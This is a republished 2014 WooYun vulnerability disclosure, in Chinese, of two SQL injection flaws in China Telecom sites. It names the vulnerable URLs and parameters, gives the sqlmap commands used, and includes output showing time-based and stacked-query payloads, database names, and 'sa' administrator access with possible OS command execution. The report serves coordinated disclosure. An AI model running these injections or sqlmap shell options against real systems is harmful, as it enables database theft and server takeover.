[公开漏洞]中国电信两处SQL注射(SA权限或影响内部办公平台)

    来源:WooYun 浏览:703次 时间:2014-06-30
中国电信两处SQL注射(SA权限或影响内部办公平台) 相关厂商: 中国电信 漏洞作者:超威蓝猫 提交时间:2014-05-16 19:47 公开时间:2014-06-30 19:47 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:15 漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源:http://www.wooyun.org Tags标签: SQL注射 漏洞详情 披露状态:

2014-05-16:细节已通知厂商并且等待厂商处理中
2014-05-21:厂商已经确认,细节仅向厂商公开
2014-05-31:细节向核心白帽子及相关领域专家公开
2014-06-10:细节向普通白帽子公开
2014-06-20:细节向实习白帽子公开
2014-06-30:细节向公众公开

简要描述:

中国电信两处SQL注射(SA权限)

详细说明:

【注射点1 - 号码百事通账户平台】

(这个注射点使用sqlmap似乎只能--dbs读出库名,--tables读不出表名。可惜我不会手工注射 ._. )

http://sso.118114.cn/SSO/registerV2.action 注册"号码百事通"帐号这里的检查用户名是否可用的HTTP请求如下(前几天用了新地址但是原先存在SQL注射的这个页面并没有被删除)

http://customer.besttone.com.cn/UserPortal/PutAuthenCodeForRegisterAllInOne.aspx?PhoneNum=13000000000&SPID=35433333&count=2&typeId=1



其中的SPID参数存在SQL注射。

【注射点2 - 中国电信内部办公网】

在电信官网可以看到 http://www.chntel.com 为内部办公平台

01.jpg



该站点找回密码页面均在 218.30.7.23 这个服务器上。

该服务器上的这个地址存在SQL注射:

http://218.30.7.23/supervise/loginrt.jsp?CertSerial=111

漏洞证明:

【注射点1】

sqlmap.py -u "http://customer.besttone.com.cn/UserPortal/PutAuthenCodeForRegisterAllInOne.aspx?PhoneNum=13000000000&SPID=35433333&count=2&typeId=1" --dbs --no-cast



03.jpg



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: SPID

    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries

    Payload: PhoneNum=13000000000&SPID=35433333'; WAITFOR DELAY '0:0:5'--&count=2&typeId=1



    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase time-based blind

    Payload: PhoneNum=13000000000&SPID=35433333' WAITFOR DELAY '0:0:5'--&count=2&typeId=1

---

web server operating system: Windows 2003

web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727

back-end DBMS: Microsoft SQL Server 2005

available databases [6]:

[*] besttone

[*] cip2

[*] master

[*] model

[*] msdb

[*] tempdb







【注射点2】

sqlmap.py -u "http://218.30.7.23/supervise/loginrt.jsp?CertSerial=111" --dbs --privileges --current-user



该注射点使用sqlmap的--os-cmd或--os-shell均可执行命令。

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: CertSerial

    Type: boolean-based blind

    Title: OR boolean-based blind - WHERE or HAVING clause

    Payload: CertSerial=-5327' OR (6481=6481) AND 'KoFV'='KoFV



    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries

    Payload: CertSerial=111'; WAITFOR DELAY '0:0:5'--



    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase time-based blind

    Payload: CertSerial=111' WAITFOR DELAY '0:0:5'--

---

web application technology: JSP

back-end DBMS: Microsoft SQL Server 2000

current user:    'sa'

database management system users privileges:

[*] BUILTIN\Administrators

[*] sa (administrator)



available databases [8]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] product

[*] pubs

[*] Supervise

[*] tempdb

修复方案:

电信更专业:)

版权声明:转载请注明来源 超威蓝猫@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-05-21 15:14

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报给中国电信集团公司处置。

最新状态:

暂无

上一篇: [公开漏洞]新浪微博部分App Oauth2漏洞
下一篇: 迅雷会员账号分享7月1日下载
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细